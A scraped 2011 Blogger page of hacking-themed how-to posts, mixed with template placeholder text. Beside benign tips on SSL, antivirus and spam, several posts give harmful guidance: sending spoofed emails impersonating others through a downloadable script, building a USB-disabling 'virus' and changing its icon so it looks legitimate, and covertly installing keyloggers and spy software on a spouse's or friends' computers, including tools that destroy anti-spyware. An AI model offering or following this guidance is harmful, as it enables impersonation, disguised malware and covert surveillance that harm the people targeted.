This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

music

visitors

free counters

Rabu, 20 Juli 2011

Know More About Secure Sockets Layer (SSL)



Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.
 

What exactly is Secure Communication ?

 
Suppose there exists two communication parties A (client) and B (server).
 
Working of HTTP
When A sends a message to B, the message is sent as a plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as a plain text. This has a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between A and B , he can see the PASSWORDS since they remain unencrypted. This scenario is illustrated using the following figure
 
Now lets see the working of HTTPS
When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B‘s side. So even if the Hacker gains an unauthorised access to the ongoing communication between A and B he gets only the encrypted password (“xz54p6kd“) and not the original password. This is shown below
 

How is HTTPS implemented ?

 
HTTPS is implemented using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses
  1. An SSL Certificate enables encryption of sensitive information during online transactions.
  2. Each SSL Certificate contains unique, authenticated information about the certificate owner.
  3. A Certificate Authority verifies the identity of the certificate owner when it is issued.
 
How Encryption Works ?
Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to every one but the private key(used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key(Secret key).
 
How to identify a Secure Connection ?
In Internet Explorer, you will see a lock icon Picture of the Lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.
In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.
So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations. Otherwise there are chances of Phishing using a Fake login Page.
I Hope this helps. Please pass your comments.

4 Ways to Identify Safe Websites on the Internet



Safe Websites
On the whole Internet, there are approximately more than 150 million active websites up and running. As a result, it often becomes a real challenge for the users to identify safe websites that are trustworthy and reputed. Have you ever wondered to know the reputation of a website before placing the order? Need to know whether a given website is child safe? Well, here are some of the ways to identify safe websites on the Web.
 

1. WOT or Web Of Trust (www.mywot.com):

WOT is a great place to test the reputation of your favorite website. WOT gives real-time ratings for every website based on the feedback that it gets from millions of trustworthy users across the globe and trusted sources, such as phishing and malware blacklists. Each domain name is evaluated based on this data and ratings are applied to them accordingly. A snapshot of WOT ratings for gohacking.com is shown below:
WOT Ratings for Gohacking.com
 
 
 
 
 
 
As shown in the above snapshot, the reputation of each website is shown in terms of 4 components where green means excellent, yellow warns users to be cautious and red indicates potential danger.
 
Trustworthiness signifies the overall safety of the website. A poor rating may indicate that the site is associated with threats like Internet scams, phishing, identity theft risks and malware. For more information on phishing, you may refer my other post on how to identify and avoid phishing scams.
 
Vendor reliability tells you whether a given site is safe for carrying out buy and sell transactions with it. An excellent rating indicates superior customer satisfaction while a poor rating indicates possible scam or bad shopping experience.
 
Privacy indicates about “to what extent the site respects the privacy of it’s users and protects their personal identity and data”.
 
Child Safety indicates whether the content of a given site is appropriate for children. Site contents like sexual material, nudity and vulgarity will have a poor Child Safety rating.
 
In most cases, the WOT ratings are found to be highly accurate. To check the reputation of any given website, just visit www.mywot.com type-in the address of your favorite website and click on “Check now”. This tool alone can tell you a lot about the reputation and safety level of a website. However, in addition to this, I am giving you another 3 handy tools to identify safe websites on the Web.
 

2. McCafee SiteAdvisor:

McCafee SiteAdvisor is a free tool that is available as a browser add-on. It adds safety ratings to your browser and search engine results. You can download it from www.siteadvisor.com.
 

3. StopBadware:

Using this tool, you can check whether a given site is said to have involved in malware activity in the past. To check this, go to http://www.stopbadware.org/home/reportsearch and enter the URL or domain name of a website and click on “Search Clearinghouse ”. If the search does not return any result, that means the site was never involved in any of the malware activity in the past.
 

4. Google Pagerank:

Google PageRank is another great tool to check the reputation and popularity of a website. The PageRank tool rates every webpage on a scale of 1 to 10 which indicates Google’s view of importance of the page. If a given website has a PageRank of less than 3, then it is said to be less popular among the other sites on the Internet.
 
However, PageRank will only tell you how much popular a given website is and has nothing to do with the safety level of a website. So, this tool alone cannot be used to evaluate a website’s safety and other factors.
 
PageRank feature is available as a part of Google Toolbar. You can install Google Toolbar from http://www.google.com/intl/en_uk/toolbar/ie/index.html.
 
I hope you like this article. Waiting for your comments…

Minggu, 17 Juli 2011

How to Disable Windows Logo Key



At times it becomes necessary to disable the Windows Key on the keyboard. For example when playing games this nasty Windows Logo key keeps annoying, as we often accidently press it and this takes our game out to the desktop. So it becomes necessary to disable it when not needed an re-enable it when needed.
The following download consists of two registry scripts (.reg) one to disable windows key and the other to re-enable it. In this download there are two files
disable_winlogo_key.reg - Disable Windows Logo Ley
re-enable_winlogo_key.reg - Re-Enable Windows Logo Key
Here is the Download Link

How to Hide Your IP Address


Hide IP AddressEvery time your computer is connected to the Internet, it is assigned a public IP address which is used to uniquely identify your computer. Wherever you visit websites or use Internet services, your public IP is also transmetted and recorded in the logs kept on those servers. Thus, your IP address makes it possible to trace all your web activities back to you.
 

So, How do I Hide my IP Address?

 
The best and the easiest way to hide your IP address is by using a proxy server (anonymous proxy server) in one form or the other. A proxy server is a special type of server which acts as an intermediary between your home computer (or network) and rest of the Internet. This proxy server makes requests for Internet services/information on behalf of your computer using it’s own IP address instead of yours. The obtained information is then passed on to your computer. Thus, your computer is indirectly connected to the Internet via a proxy server where the IP address of the proxy server is exposed and your actual IP address remains concealed. Web proxies are identified by a combination of URL and TCP port number which is similar to something as below:
http://207.133.133.205:35
In the above example, http://207.133.133.205 is the URL of the proxy server and 35 is the port number. There are a variety of these proxy servers available:
 
Transparent Proxy Server
This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used to speed-up the web browsing since thay have a very good ability to cache websites. But they do not conceal the IP of it’s users. It is widely known as transparent proxy because it will expose your real IP address to the outside world. This type of proxy server will not hide your IP address.
 
Anonymous Proxy Server
This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. Anonymous proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.
 
Distorting Proxy Server
A Distorting proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address.
 
High Anonymity Proxy Server (Elite Proxy)
An Elite proxy server does not identify itself as a proxy server and will not make the original IP address available to the outside world. This type of proxy server will hide your IP address.
 

Which Proxy is the Best?

 
Clearly High Anonymity Proxy (Elite Proxy) is the best to hide your IP address. Because of it’s nature, the elite proxy neither identifies itself as a proxy server nor will expose your real IP address to the Internet. Hence, it provides maximum privacy for your Internet activities.
You can obtain a long list of proxy server URLs on Google and configure your browser settings so as to make them working for you. However, most of the free proxy servers you get on the Internet will not be effective in concealing your IP address. Even if some of them work they will be too slow and may take several minutes for a single webpage to load.
So, in order to connect to a blazing fast elite proxy server, I recommend you to use the following IP Hiding software:
Hide the IP (Tested)
 
Hide the IP will put you behind a blazing fast Elite Proxy Server(High Anonymous Proxy) with just a click of a button. With this program, you need not worry about configuring your browser settings.
All you have to do is just install the program and select the proxy server you want to be behind. It offers a list of countries from which you can decide which country to be indicated as your origin.
 

How to ensure that the IP is hidden?

 
Before you hide your IP address, you can check your real IP by visiting the following website:
Once you get your real IP, switch on your IP hiding software. Now once again visit the above site and check your IP address. If you see a new IP then this means that your software is doing the right job.
Also, the above site (Whatismyipaddress.com) is capable of detecting many proxies. If you see the words such as “suspected proxy server or network sharing device” or similar words then, it means that the proxy you are using is not an Elite Proxy.
Download Hide the IP now and see the difference for yourself. For more information on this product, visit Hide the IP homepage from the following link:
Hide the IP (Download Link)

How to Enable Telnet Command in Vista



Most of you are familiar with the telnet command. It is one of the well known Windows IP Utilities. In fact the telnet command is most important for sending a fake email which i have discussed in my previous post. If you are using Windows XP the telnet command is available by default.But if you use Windows Vista the telnet command is disabled by default.
So when you try to use the telnet command in Windows Vista you get the following error message.
‘telnet’ is not recognized as an internal or external command,operable program or batch file.
You get this error in Vista because unlike XP, Vista does not support telnet command by default. So, for this you have to manually enable/turn on the telnet feature in Vista.
Here’s the step by step procedure to enable telnet feature (telnet command) in Windows Vista.
1. Goto the Control Panel.
2. Click on the sub heading Uninstall a program under the main heading Programs.
NOTE: IF you are in the Classic View click on Programs and Features.
3. Now in the left panel under the Tasks select the option Turn Windows features on or off.
4. Now a new window opens. In the new window select the following
Telnet Client
Telnet Server (optional)
5. After selecting click on OK.
Now wait for few minutes till the telnet feature is installed. Once the telnet feature is installed you can goto the command prompt and use the telnet command. System restart is not required.

How to Send Anonymous Emails


How To Send Anonymous Emails

Most of us are very curious to know a method to send anonymous emails to our friends for fun. But the question is, is it possible to send anonymous emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with the following sender details.
From: Bill Gates <billg@microsoft.com>
The art of sending this kind emails is known as Email Spoofing. In my previous post on How to Send Fake Email I insisted on using your own SMTP server to send anonymous emails. This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo(all major email service providers) blocks the emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has 100% success rate. If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server.
 
What is a Relay Server?
In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.
 
So What’s Next?
Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it.
I have created a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to setup your own Anonymous Email Sender Script
 
1. Goto X10 Hosting  and register a new account.
2. Download my Anonymous Email Sender Script (sendmail.rar).
3. Login to your FreeWebHostingArea Account and click on File Manager.
4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.
5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.
6. Now type the following URL
http://yoursite.x10hosting.com/sendmail.php
NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.
7. Use the script to send Anonymous Emails. Enjoy!!!
Tell me whether it worked or not. Please pass your comments…
WARNING: ALL THE INFORMATION PROVIDED IN THIS POST ARE FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.

Free Tools for Spyware Removal



There are lot of PC users who know only little about “Spyware”, “Malware”, “hijackers”, “Dialers” & many more. This article will help you avoid pop-ups, spammers and all those baddies.

What is Spyware?

Spyware is computer software that is installed surreptitiously on a personal computer to intercept or take partial control over the user’s interaction with the computer, without the user’s informed consent. The term spyware suggests software that secretly monitors the user’s behavior. Spyware programs can collect various types of personal information, such as Internet surfing habit, sites that have been visited etc.

How to check if a program has spyware?

It is this little site that keeps a database of programs that are known to install spyware.
Check Out: SpywareGuide

How To Block Pop-Ups?

If you would like to block pop-ups (IE Pop-ups) there are tons of different tools out there, but these are the two best, I think.
Try: Google Toolbar - This tool is a Freeware.
Try: AdMuncher – This tool is a Shareware.

How To Remove Spywares?

If you want to remove spwares then you may try the following tools/programs
Try: Lavasoft Ad-Aware – This tool is a freeware.
Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.
Try: Spybot-S&D – This tool is a freeware.
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.
Try: Spy Sweeper – This tool is a shareware.
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. The best scanner out there, and updated all the time.
Try: BPS Spyware and Adware Remover – This tool is a shareware.
Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you’d like to remove.

How To Prevent Spyware?

To prevent spyware attack you can try the following tools.
Try: SpywareBlaster – This tool is a freeware.
Info: SpywareBlaster doesn’t scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage.
Try: XP-AntiSpy – This tool is a freeware.
Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people.

How to Change the ICON of an EXE file



Some times it becomes necessary to change the ICON of an executable (.exe) file so that the exe file get’s a new appearence. Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user. But in reality when the file is carried to a different computer, then it shows it’s original ICON itself. This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself. Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.
For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie: The tool changes the exe ICON permanantly.
I’ll give you a step-by-step instruction on how to use this tool to change the icon.
1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).
2. Right-click on the exe file whose ICON is to be changed.
3. Now you will see the option Change Icon. Click on that option.
4. Now the Icon Changer program will open up.
5. Icon changer will search for all the ICONS on your system so that you can select any one of those.
6. Now select the ICON of your choice and click on SET.
7. Now a popup window will appear and ask you to select from either of these two options.
  • Change embeded icon.
  • Adjust Windows to display custom icon.
Select the first option (Change embeded icon).
8. You are done. The ICON get’s changed.

How to Download Videos from Youtube



Here is the most easiest way to download videos from Youtube and convert it into other formats.Most of the sites give you some confusing way to download videos from Youtube, but here is an easy way. Here is step-by-step guide to download videos from Youtube.
STEP-1. DOWNLOADING THE VIDEO FROM YOUTUBE
Basically the video that you want to download from Youtube will be in the .flv format. So first, when you download videos from Youtube, it will be saved in .flv format. 
Once you get the video URL,  you can use any one of the following sites/plugins to download Youtube videos .
  • Download Youtube Videos - Download Youtube Videos is one of the most widely site to download videos from Youtube in the .flv format. Here you’ll see a box to enter the download URL. Just enter the URL here and click on download to save the video.
  • KissYouTube - KissYouTube offers an easiest way to download videos from Youtube. Just visit the site and you’ll find a box to enter the video URL. In this box enter the URL of the video you want to download and click on GO. Next you will see a Download Button. Click on the download button and save the Youtube video with the extension as .flv .
  •  Download Helper - Download Helper is an excellent firefox plugin to download videos from Youtube.
  • My Video Downloader - MyVideo Downloader will Download and convert videos from many sites, not just YouTube.
STEP-2. CONVERTING THE YOUTUBE VIDEO FROM .FLV TO OTHER FORMATS
Once you download the video ,you can use any of the freely available/commercial video conversion softwares. But here in this tutorial I prefer SUPER Video Converter to convert the downloaded Youtube video. SUPER is a freeware and supports a variety of formats. The speciality of this video converter is that it supports almost all the formats. Once you convert the Youtube downloaded video to MPEG format you’ll be able to play it with Windows Media Player.

How to Protect an Email Account from being Hacked



Today in this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is: “Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.
If this is the case, then what is the reason for many people to lose their accounts?
The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who lose their email accounts are not the victims of hacking but the victims of Trapping. They lose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.
Are you confused? If so continue reading and you’ll come to know…
Now I’ll mention some of the most commonly used online scams which fool people and make them lose their passwords. I’ll also mention how to protect your email account from these scams.
1. WEBSITE SPOOFING
Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original) especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.
For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and lose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.
Solution:
  • Never try to login/access your email account from the sites other than the original site.
  • Always type the URL of the site in the address bar to get into the site. Never click on the hyperlink to enter the site.
2. BY USING KEYLOGGERS
The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely lose your password. This is because the keylogger records each and every keystroke that you type.
Solution:
Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.
3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES
Do you access your email from cyber cafes?  Then definitely you are under the risk of loosing your password.In fact many people lose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.
This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.
So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked. Please pass your comments…

How to Monitor a Remote Computer


Monitor Remote ComputerMost of the time, it becomes necessary for us to monitor our own computer or a remote computer to keep track of the activities going on. This may be for several reasons. Especially it is most necessary for the parents to monitor their computer to keep track of their children’s activities during their absence. Some people may also require to monitor their computer to keep an eye on the activities of their spouse or partner.
Today, with the advancement in the field of software technology, it is possible to easily monitor any given computer. For this all you have to do is, use a PC Monitoring Software.
But the job doesn’t end here. This is because, there exists tons of such monitoring softwares on the market and many times people often get confused which one to choose and how to use them. So I have decided to make this job simpler for you, by writing this post. In this post I’ll give a detailed information about computer monitoring softwares which include their features, advantages, installation, usage procedure and so on. To make this post interesting, let’s take up each topic in the form of a question and answer.
 
What exactly is a Monitoring Software and how can it help me?
A computer monitoring software is just like any other software (program) which when installed, secretly monitors each and every activity that takes place on the computer. The activities such as web browsing, chatting, gaming etc. are all recorded and saved. These monitoring softwares can record each and every keystroke. So it is possible to capture usernames and passwords very easily with minimum effort. Monitoring softwares are also commonly known as Keyloggers.
 
How can I install a monitoring software?
Installing a monitoring software is too simple. During the installation, you need to setup a secret password and hotkey combination which is required later to see the recorded data ( logs). After the installation is complete the software goes invisible, but keeps running in the background. Whenever you want to see the logs, just press the hotkey combination (ex. Shift+Ctrl+F10). Now a small window will popup asking for a password. Here you need to enter the password that was setup during the installation time. After you enter the password you’ll be able to see all the activities that took place on the computer during your absence.
 
Can the person using the computer come to know about the presence of the Monitoring Software?
Most of the time it becomes impossible to detect the presence of the monitoring software. This is because, once installed it hides itself from Start menu, Program Files, Control Panel, Task manager etc. Because of it’s stealth behaviour the user can never come to know that he/she is under the presence of monitoring.
 
Which Monitoring Software should I use?
There exists different flavours of these softwares and you have to choose the one that best match your needs. Here is a list of some of the best monitoring programs that I recommend.
 

For Monitoring a Local PC:

 
If you want to monitor a local PC (may be your own PC) then the following program is recommended.
You can find a Complete Installation Guide for Spy Agent Stealth HERE
 

For Monitoring a Remote PC (Also works on local PC):

 
If you want to monitor a remote PC  you may use the following programs. These programs works for remote PC as well as local PC.
SniperSpy
 

For Monitoring a Network:

 
The following program can be used to monitor an Entire Network of computers from one central location. This becomes handy to monitor the staff in a company or students in a school/college.
NetVizor
You can find a Complete Installation Guide for NetVizor HERE
 

For monitoring a Cell Phone from your PC:

 
If you want to monitor a Cell Phone from your PC you can refer the following link:
Cell Phone Spy
I hope this helps. Pass your comments.

How to Protect an Email Account from SPAM


Stop SPAMMost of us get SPAM every day. Some of us get more and some little. Even a newly created email account will begin to receive spam just after a few days of it’s creation. Many times we wonder where these spam come from and why? But this question remains unanswered within ourselves. So in this post I will try my best to give every possible information about the spam and will also tell you about how to combat spam.
What is SPAM?
Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam.
Where do these SPAM come from?
These spam come only from spammers and never from a legitimate user or a company. These spammers send a single email to hundreds (some times thousands or millions) of email addresses at a time. They either send it manually or use spambots to automate the process of spamming.
Why do spammers SPAM?
The main goal of spammers is to send the spam (unsolicited bulk messages) to as many people as possible in order to make profit. For example, John builds a small website to sell an ebook which gives information about weight loss. In order to make sales he needs publicity for his website. Instead of spending money on advertising, John decides to create an email which contains information about his site along with it’s link and send this email to say 100 email addresses in his contact list. If 1 person out of hundred buy this book john gets $10. What if he sends this email to 1000s of email addresses. He gets $100. Imagine, if he sends this email to 1 Million email addresses he gets $100000.
Now I hope you understood the idea behind spamming. So in order to make money, spammers send their advertising emails to as many people as possible without respecting the recipient’s privacy.
From where do SPAMmers get my email address?
On the Internet there exists many sites who collect the email IDs of people and sell them to spammers in bulk. Most often, people sign up for monthly newsletters and take up surveys. This is the time where these scam sites get their email addresses. Also many spammers collect email addresses by using spambots. These spambots collect email addresses from the Internet in order to build mailing lists. Such spambots are web crawlers that can gather email addresses from Web sites, newsgroups, forums, special-interest group (SIG) postings, and chat-room conversations.
Spammers also use the trick of creating Hoax Emails for gathering a huge list of email IDs. For example, a spammer sends a hoax email which says “Forward this Message to Help Severely Burned Child”. This email claims that 11 cents will be donated to the child’s family every time the message is sent to others. Most of the people believe this and start forwarding this hoax email to all of the IDs in their contact list. In this way the email spreads rapidly and eventually when it reaches the creator (spammer), the spammer gets a huge list of valid email addresses in the email header. When you get these kind of hoax emails, you can see for yourself in the email header which contains a huge list of email addresses of all those people to whom the email is being forwarded to. This is one of the effective methods used by spammers to gather email addresses.
Is SPAMming legal?
Spamming is completely illegal. Yet it is really difficult to stop spammers from spamming since they keep moving from one hosting company to another after getting banned. This makes it practically impossible to catch spammers and prosecute them.
How to protect my email account from getting SPAMmed?
The following methods can be used to combat email spam.
1. Use spam filters for your email account. If you’re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by defaut. Each spam filter has it’s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.
2. Do not post your email address in public forums, user comments and chat-rooms. Give your email address only to trustworthy websites while signing up for newsletters.
3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead singup for a dummy email account and use this for surveys and feedback forms.
4. While posting your contact email address on your website use this format: emailaddress [at] yoursite.com instead of emailaddress@yoursite.com. This protects your email address from being indexed by spambots.
5. Do not respond to hoax messages. When you receive a hoax email, avoid forwarding it to your friends. Examples of hoax messages can be found at www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use “Bcc” (blind carbon copy) option to send the email. This will hide all the email IDs to which the mail is forwarded to.
I hope this helps. Pass your suggestions and feedback via comments.

12 Tips to Maintain a Virus Free Computer


Computer VirusIs your computer infected with virus? Do you often get mysterious error messages? Well this is a common problem faced by almost all the computer users across the globe. There are many viruses and worms out there that could infect your computer. Some are harmless, but, they do have the capacity to do any number of nasty things, up to and including, erasing all data from your computer. However there are ways to keep viruses away from your PC. Here are the 12 tips to maintain a virus free computer.
1. Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that has it’s origin from a trusted source such as those which comes from your contact list. If you are using your own private email host (other than gmail, yahoo, hotmail etc.) then it is highly recommended that you use a good anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted sources.
2. USB thumb/pen drives is another common way by which viruses spread rapidly. So it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is a safe way to open a pen drive. 
3. Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).
4. As we all know, Internet is the main source of all the malicious programs including viruses, worms, trojans etc. In fact Internet contributes to virus infection by up to 80%. So here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.
  • Don’t click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.
  • You can also use a pop-up blocker to automatically block those pop-ups.
5. Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So to avoid visiting those untrusted malicious websites, you can download and install the AVG LinkScanner which is a freeware. This tool can become very handy and will help you to stay away from malicious websites.
6. Install a good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from virues. If PC security is your first option then it is recommended that you go for a shareware antivirus software over the free ones. Most of the antivirus supports the Auto-Protect feature that provides realtime security for your PC. Make sure that this feature is turned on.
7. Install a good Antispyware program, that operates against Internet malware and spyware.
8. Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still do a scan before opening.
9. Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.
10. Set up your Windows Update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.
11. While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.
12. And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. since they contribute much in spreading of viruses and other malicious programs.

A Virus Program to Disable USB Ports


Virus to disable USB portsIn this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).
I hope you like this post. Please pass your comments.

Which is the Best Computer Spy Software


Find out the Best Computer Spy Software


Best Spy SoftwareIf you are in search of the best Computer Spy Software on the Internet, then you’ve landed at the right place. In this post I will try to give my honest review of some of the top spy softwares on the market. Here you will find every possible information that you need to know before you make a choice of the right Spy software. So, I highly recommend that you read this post completely before you make your next move.
Since I have already discussed how to use these spy tools in my previous post How to Monitor Local or Remote PC, in this post I’ll only give the information on how to choose the best spy software.
Today, there is a huge demand for the spy softwares on the Internet since a lot of people want to monitor the activities of their children, spouse, friends etc. Some people also use these softwares to hack the email passwords of their friends or relatives. Due to this huge demand, a lot of substandard spy programs have started to step into the market.
As we all know there exists tons of spy softwares from number of companies and they all boast that, their software is the best. But can this be true? Absolutely not. The truth is, almost 80% of the spy programs available on the Internet are of substandard quality and fail to meet the minimum requirements. In the remaining 20% only 3-5% will manage to come on top and prove themselves to be successful. With this being the case, it is very much necessary to determine the best software before making a purchase. Here are some of the crucial criteria that you’ve to look into:
In addition to Keylogging, the spy software must have the following basic features:
1. Capture screenshots, chat-room, web and web-cam activities.
2. The spy software must possess a Remote Install Feature to monitor a Remote computer.
3. It must be able to detect and destroy anti-spyware softwares. As we all know, most computers today are equipped with anti-spy softwares. So, it is very much necessary that it is destroyed before the spy-software is installed.
4. It must remain undetected and run in a total stealth mode.
